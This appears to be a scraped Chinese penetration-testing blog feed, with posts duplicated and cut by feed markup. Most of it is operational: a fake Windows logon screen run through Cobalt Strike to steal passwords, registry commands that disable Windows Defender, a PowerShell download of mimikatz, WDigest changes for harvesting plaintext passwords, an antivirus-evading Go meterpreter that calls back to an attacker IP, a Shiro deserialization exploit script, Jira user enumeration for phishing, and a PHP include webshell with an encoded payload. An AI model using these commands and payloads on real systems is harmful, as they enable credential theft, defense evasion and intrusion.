可以配合Cobalt Strike,系统上线后,进入到beacon中,然后直接执行execute-assembly /root/Desktop/FakeLogonScreen.exe
。(后面为控制机上的文件路径,非被控机的路径)。接下来就是等待对方输入密码,即可在进入的beacon中显示输入的密码了。效果图如下:
FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得更加真实,成功率也会更高。
另外,该程序会对输入的密码进行Active Directory或本地计算机的认证,以确保窃取密码的准确性。它可以显示在控制台,也可以保存早文件远程系统的硬盘上。
这个软件的好处就是可以与其它工具配合使用,可以直接通过内存执行(无文件)。比如可以配合Cobalt Strike的execute-assembly来执行。
由于使用c#编写,需要系统中有.net framework框架。这里测试windows10和windows7,系统均为64位。在其release的版本中,作者给出来.net framework3.5和4.5的可执行程序。适用于windows7 和windows10等情况。实际中可根据实际情况进行选择。
可以配合Cobalt Strike,系统上线后,进入到beacon中,然后直接执行execute-assembly /root/Desktop/FakeLogonScreen.exe
。(后面为控制机上的文件路径,非被控机的路径)。接下来就是等待对方输入密码,即可在进入的beacon中显示输入的密码了。效果图如下:
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force
下载mimikatz后解压缩。
powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"
修改注册表开启UseLogonCredential
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
等用户下次再登录的时候,可抓到明文密码
mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
]]>REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force
下载mimikatz后解压缩。
powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"
修改注册表开启UseLogonCredential
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
等用户下次再登录的时候,可抓到明文密码
mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
]]>做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。
修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。
set GOARCH=386
go build -ldflags="-H windowsgui -w"
注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。
由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。
加入了Bypass AV的代码。
我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。
今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。
在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。
]]>做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。
修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。
set GOARCH=386
go build -ldflags="-H windowsgui -w"
注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。
由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。
加入了Bypass AV的代码。
我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。
今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。
在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。
]]>Windows下载地址:
https://pan.baidu.com/s/10y_nGpe-rLHqRoyB4Hz3BQ
Linux 下载地址:
https://mega.nz/#!JAxkRQgB!RcaAd5-zHKTNQHD28YcAocKB4RVoNDrOZRnL5bCLj0g
官网介绍地址
https://www.acunetix.com/vulnerability-scanner/
注:工具来源于网络,请自行验证是否存在后门等情况,为了安全考虑建议使用虚拟机运行。
]]>Windows下载地址:
https://pan.baidu.com/s/10y_nGpe-rLHqRoyB4Hz3BQ
Linux 下载地址:
https://mega.nz/#!JAxkRQgB!RcaAd5-zHKTNQHD28YcAocKB4RVoNDrOZRnL5bCLj0g
官网介绍地址
https://www.acunetix.com/vulnerability-scanner/
注:工具来源于网络,请自行验证是否存在后门等情况,为了安全考虑建议使用虚拟机运行。
]]>工具下载地址:Shiro_Exploit
该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
Python2.7
requests
Jdk 1.8
usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]
OPTIONS:
-h, --help show this help message and exit
-u URL, --url URL Target url.
-t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
gadget
-p PARAMS, --params PARAMS
gadget params
-k KEY, --key KEY CipherKey
Example: python shiro_exploit.py -u target
检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost}
这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。
工具下载地址:Shiro_Exploit
该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
Python2.7
requests
Jdk 1.8
usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]
OPTIONS:
-h, --help show this help message and exit
-u URL, --url URL Target url.
-t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
gadget
-p PARAMS, --params PARAMS
gadget params
-k KEY, --key KEY CipherKey
Example: python shiro_exploit.py -u target
检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost}
这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。
首先来简单说一下这个漏洞,该漏洞就是在Jira 8.4.0以前的版本,攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。
2020年2月3日在exploit-db上公布了该漏洞利用脚本。地址:
Jira 8.3.4 - Information Disclosure (Username Enumeration) 。
其漏洞很简单,只需要访问 http://target/rest/api/latest/groupuserpicker?query=admin (target为目标jira系统地址)。如果返回的是json字符串就说明存在漏洞。如果返回"You are not authenticated. Authentication required to perform this operation." 则说明不存在这个漏洞。
那漏洞应该如何利用呢?
1、通过字典方式,探测用户是否存在。
2、如果存在漏洞,那么一旦匹配到结果,则会返回json格式的字符串,其中包含来用户民、邮箱、和显示的名字信息。在实际测试中发现,请求的参数不一定是用户的全拼,例如我们输入c,也是可以返回相关结果的。我们可以改变query参数的值,从a至z遍历。这样就可以获取系统中的用户名列表。
通过以上获取信息后,可以进行后续的利用。比如爆破用户密码,邮箱密码,发送钓鱼邮件等等。具体根据实际场景和相关经验进行扩展。
首先来简单说一下这个漏洞,该漏洞就是在Jira 8.4.0以前的版本,攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。
2020年2月3日在exploit-db上公布了该漏洞利用脚本。地址:
Jira 8.3.4 - Information Disclosure (Username Enumeration) 。
其漏洞很简单,只需要访问 http://target/rest/api/latest/groupuserpicker?query=admin (target为目标jira系统地址)。如果返回的是json字符串就说明存在漏洞。如果返回"You are not authenticated. Authentication required to perform this operation." 则说明不存在这个漏洞。
那漏洞应该如何利用呢?
1、通过字典方式,探测用户是否存在。
2、如果存在漏洞,那么一旦匹配到结果,则会返回json格式的字符串,其中包含来用户民、邮箱、和显示的名字信息。在实际测试中发现,请求的参数不一定是用户的全拼,例如我们输入c,也是可以返回相关结果的。我们可以改变query参数的值,从a至z遍历。这样就可以获取系统中的用户名列表。
通过以上获取信息后,可以进行后续的利用。比如爆破用户密码,邮箱密码,发送钓鱼邮件等等。具体根据实际场景和相关经验进行扩展。
目前知名企业邮箱(如腾讯企业邮箱)均支持该协议,许多人喜欢用邮件客户端或者手机收发邮件,则大多数会选择开启该服务。在大多数情况下适用。(文末有脚本下载地址)。
该脚本使用Python开发,2和3版本均可运行。
目前知名企业邮箱(如腾讯企业邮箱)均支持该协议,许多人喜欢用邮件客户端或者手机收发邮件,则大多数会选择开启该服务。在大多数情况下适用。(文末有脚本下载地址)。
该脚本使用Python开发,2和3版本均可运行。
记得Phpmyadmin的index.php文件中包含有include ROOT_PATH . $_REQUEST['target'];
这样的代码,如果不看上下文,这个妥妥的文件包含漏洞。不过上文有过滤和判断处理,导致无法包含任意文件。我将其修改为包含任意文件。同时保留来一些源码,把影响执行的代码注释掉(因为适应多种环境,适用但文件的情况)。
最终修改的代码如下:
记得Phpmyadmin的index.php文件中包含有include ROOT_PATH . $_REQUEST['target'];
这样的代码,如果不看上下文,这个妥妥的文件包含漏洞。不过上文有过滤和判断处理,导致无法包含任意文件。我将其修改为包含任意文件。同时保留来一些源码,把影响执行的代码注释掉(因为适应多种环境,适用但文件的情况)。
最终修改的代码如下:
具体请看代码:
<?php
function cc(){
global $b;
$a =$_GET[$b]; //此处可改成POST方式
$str =$a;
return $str;
}
?>
<?php
$b="url";
$c=cc();
$aa = $c;
include($aa);
传入参数方式:
http://127.0.0.1/test/include.php?url=本地或远程文件名(或者利用data:image/png的这种格式)
例如:
http://127.0.0.1/test/include.php?url=data:image/png;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
上看base64,后面为要执行的代码,代码要带,实战中可以把代码改成一句话,然后使用菜刀连接即可。
具体请看代码:
<?php
function cc(){
global $b;
$a =$_GET[$b]; //此处可改成POST方式
$str =$a;
return $str;
}
?>
<?php
$b="url";
$c=cc();
$aa = $c;
include($aa);
传入参数方式:
http://127.0.0.1/test/include.php?url=本地或远程文件名(或者利用data:image/png的这种格式)
例如:
http://127.0.0.1/test/include.php?url=data:image/png;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
上看base64,后面为要执行的代码,代码要带,实战中可以把代码改成一句话,然后使用菜刀连接即可。
首先我们来说一下常用的print。
最明显的区别就在于,我们在2.x版本中的print "hello world"
,在3.x版本中会报错。必须要以print("hello world")
这样的格式。为什么会发生这样的变化呢?下面就让我们来看一下~
首先我们来说一下常用的print。
最明显的区别就在于,我们在2.x版本中的print "hello world"
,在3.x版本中会报错。必须要以print("hello world")
这样的格式。为什么会发生这样的变化呢?下面就让我们来看一下~
Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。
在服务端接收cookie值时,按照如下步骤来解析处理:
1、检索RememberMe cookie 的值
2、Base 64解码
3、使用AES解密(加密密钥硬编码)
4、进行反序列化操作(未作过滤处理)
在调用反序列化时未进行任何过滤,导致可以触发远程代码执行漏洞。
]]>Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。
在服务端接收cookie值时,按照如下步骤来解析处理:
1、检索RememberMe cookie 的值
2、Base 64解码
3、使用AES解密(加密密钥硬编码)
4、进行反序列化操作(未作过滤处理)
在调用反序列化时未进行任何过滤,导致可以触发远程代码执行漏洞。
]]>